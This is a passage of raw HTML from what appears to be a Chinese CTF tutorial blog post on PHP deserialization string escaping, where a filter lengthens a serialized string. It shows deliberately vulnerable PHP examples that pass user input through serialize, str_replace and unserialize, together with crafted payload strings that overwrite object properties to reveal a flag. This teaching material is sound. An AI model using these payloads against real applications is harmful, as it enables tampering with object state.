data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-98\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ued0e1345\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69-1024x244.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"244\" data-attachment-id=\"99\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=99\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69.png\" data-orig-size=\"1850,440\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69-300x71.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69-1024x244.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69-1024x244.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-99\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"rKq4X\">\u5b57\u7b26\u4e32\u589e\u591a<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"jE2nS\">\u793a\u4f8b\u4ee3\u7801<\/h5>\n\n\n\n<pre id=\"lUxE1\" class=\"wp-block-code\"><code>&lt;?php\nclass A{\n    public $v1 = 'ls';\n    public $v2 = '123';\n    public function __construct($arga,$argc){\n        $this-&gt;v1 = $arga;\n        $this-&gt;v2 = $argc;\n    }\n}\n$a = $_GET&#91;'v1'];\n$b = $_GET&#91;'v2'];\n$data =  serialize(new A($a,$b));\n$data = str_replace(\"ls\",\"pwd\",$data);\nvar_dump(unserialize($data));<\/code><\/pre>\n\n\n\n<p id=\"u5355cab3\">PHP \u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u662f\u4e25\u683c\u4f9d\u8d56\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u4e2d\u7684 \u957f\u5ea6\u6807\u8bc6\uff08\u5982 s:5:&#8221;value&#8221; \u4e2d\u7684 5\uff09\u6765\u5224\u65ad\u5b57\u7b26\u4e32\u5728\u54ea\u91cc\u7ed3\u675f\u7684<\/p>\n\n\n\n<p id=\"udc926c25\">\u8fd9\u6bb5\u4ee3\u7801\u4e2d\u5b58\u5728serialize\u540e\u7d27\u63a5\u7740str_replace\u7684\u64cd\u4f5c\uff0c\u4e14\u66ff\u6362\u540e\u7684\u5b57\u7b26\u4e32\u957f\u5ea6\u53d1\u751f\u4e86\u53d8\u5316\uff08\u672c\u4f8b\u4e2d ls $\\to$ pwd\uff0c\u957f\u5ea6\u7531 2 \u53d8\u4e3a 3\uff09\uff0c\u5c31\u4f1a\u5bfc\u81f4\u5b9e\u9645\u5b57\u7b26\u4e32\u5185\u5bb9\u6bd4\u957f\u5ea6\u6807\u8bc6\u6240\u8bb0\u5f55\u7684\u66f4\u957f<\/p>\n\n\n\n<p id=\"ud822b908\">\u8fd9\u5c31\u7ed9\u4e86\u653b\u51fb\u8005\u4e00\u4e2a\u673a\u4f1a\uff1a\u5229\u7528\u589e\u52a0\u51fa\u7684\u957f\u5ea6\uff0c\u5c06\u539f\u672c\u5c5e\u4e8e\u201c\u503c\u201d\u7684\u4e00\u90e8\u5206\u5185\u5bb9\u6324\u51fa\u53bb\uff0c\u4f7f\u5176\u88ab\u53cd\u5e8f\u5217\u5316\u89e3\u6790\u5668\u8bc6\u522b\u4e3a\u7ed3\u6784\u4ee3\u7801\uff08\u5982\u5c5e\u6027\u540d\u6216\u5bf9\u8c61\u7ed3\u675f\u7b26\uff09\uff0c\u4ece\u800c\u7be1\u6539\u5bf9\u8c61\u7684\u5c5e\u6027\u3002<\/p>\n\n\n\n<p id=\"ue3d1c8f3\">\u8fd9\u9053\u9898\u4e2d\u539f\u59cb\u5b57\u7b26\uff1als\u662f\u4e24\u4e2a\u5b57\u7b26 \u66ff\u6362\u6210\u4e86pwd\u5c31\u662f3\u4e2a\u5b57\u7b26 \u5dee\u503c\u4e3a1<\/p>\n\n\n\n<p id=\"u66f0c36d\">\u6211\u4eec\u8981\u901a\u8fc7\u63a7\u5236 $v1 \u7684\u8f93\u5165\uff0c\u6765\u63a7\u5236 $v2 \u7684\u503c\uff0c\u4f8b\u5982\u5c06 $v2 \u7684\u503c\u4ece\u9ed8\u8ba4\u7684 123 \u4fee\u6539\u4e3a hacked<\/p>\n\n\n\n<pre id=\"ar8SV\" class=\"wp-block-code\"><code>\";s:2:\"v2\";s:6:\"hacked\";}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1003\" height=\"753\" data-attachment-id=\"100\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=100\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70.png\" data-orig-size=\"1003,753\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70-300x225.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-100\"  sizes=\"auto, (max-width: 1003px) 100vw, 1003px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u725f2d5b\">\u6211\u4eec\u6784\u9020\u51fa\u6765\u7684payload\u957f\u5ea6\u4e3a25\uff0c\u90a3\u4e48\u6211\u4eec\u8981\u5728\u524d\u9762\u52a0\u4e0a25\u4e2als<\/p>\n\n\n\n<pre id=\"dVNcx\" class=\"wp-block-code\"><code>lslslslslslslslslslslslslslslslslslslslslslslslsls\";s:2:\"v2\";s:6:\"hacked\";}<\/code><\/pre>\n\n\n\n<p id=\"u236377ba\">\u7ed9v1\u8d4b\u503c\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71-1024x451.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"451\" data-attachment-id=\"101\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=101\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71.png\" data-orig-size=\"1919,845\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71-300x132.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71-1024x451.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71-1024x451.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-101\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u04e798e1\">\u5b57\u7b26\u4e32\u66ff\u6362\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72-1024x493.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"493\" data-attachment-id=\"102\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=102\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72.png\" data-orig-size=\"1918,923\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72-300x144.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72-1024x493.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72-1024x493.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-102\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73-1024x493.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"493\" data-attachment-id=\"103\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=103\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73.png\" data-orig-size=\"1918,923\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73-300x144.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73-1024x493.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73-1024x493.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-103\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u2009f467\">\u6210\u529f\u9003\u9038\uff0c\u5c06hacked\u8d4b\u503c\u7ed9\u4e86$v2<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"OgDIA\">\u4f8b\u9898<\/h5>\n\n\n\n<pre id=\"IVEgc\" class=\"wp-block-code\"><code>&lt;?php\nfunction filter($name){\n    $safe=array(\"flag\",\"php\");\n    $name=str_replace($safe,\"hack\",$name);\n    return $name;\n}\nclass test{\n    var $user;\n    var $pass='daydream';\n    function __construct($user){\n        $this-&gt;user=$user;\n    }\n}\n$param=$_GET&#91;'param'];\n$param=serialize(new test($param));\n$profile=unserialize(filter($param));\n\nif ($profile-&gt;pass=='escaping'){\n    echo file_get_contents(\"flag.php\");\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u6e211551\">\u8fd9\u91cc\u4f1a\u5c06php[3\u5b57\u7b26]\u66ff\u6362\u6210hack[4\u5b57\u7b26]\uff0c\u5dee\u503c\u4e3a1<\/p>\n\n\n\n<p id=\"u36b5cc32\">\u8fd9\u91cc\u8f93\u51faflag\u7684\u6761\u4ef6\u662f$profile-&gt;pass==&#8217;escaping&#8217;<\/p>\n\n\n\n<p id=\"u10881d86\">\u6211\u4eec\u751f\u6210\u4e00\u4e2apayload<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74-1024x670.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"670\" data-attachment-id=\"104\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=104\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74.png\" data-orig-size=\"1459,955\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74-300x196.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74-1024x670.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74-1024x670.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-104\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre id=\"m0h6k\" class=\"wp-block-code\"><code>\";s:4:\"pass\";s:8:\"escaping\";}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1003\" height=\"753\" data-attachment-id=\"105\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=105\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75.png\" data-orig-size=\"1003,753\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75-300x225.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-105\"  sizes=\"auto, (max-width: 1003px) 100vw, 1003px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ub5fcf8e9\">\u957f\u5ea6\u4e3a29\uff0c\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u9700\u8981\u8f93\u516529\u4e2aphp<\/p>\n\n\n\n<p id=\"uf77bd47b\">\u53cd\u5e8f\u5217\u5316\u7ed3\u679c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76-1024x412.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"412\" data-attachment-id=\"106\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=106\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76.png\" data-orig-size=\"1911,768\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76-300x121.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76-1024x412.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76-1024x412.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-106\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u75d079d2\">\u8fc7\u6ee4\u66ff\u6362<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77-1024x450.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"450\" data-attachment-id=\"107\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=107\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77.png\" data-orig-size=\"1919,844\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77-300x132.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77-1024x450.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77-1024x450.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-107\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u287defdd\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78-1024x506.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"506\" data-attachment-id=\"108\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=108\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78.png\" data-orig-size=\"1919,948\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78-300x148.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78-1024x506.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78-1024x506.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-108\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u287defdd\"><\/p>\n\n\n\n<p 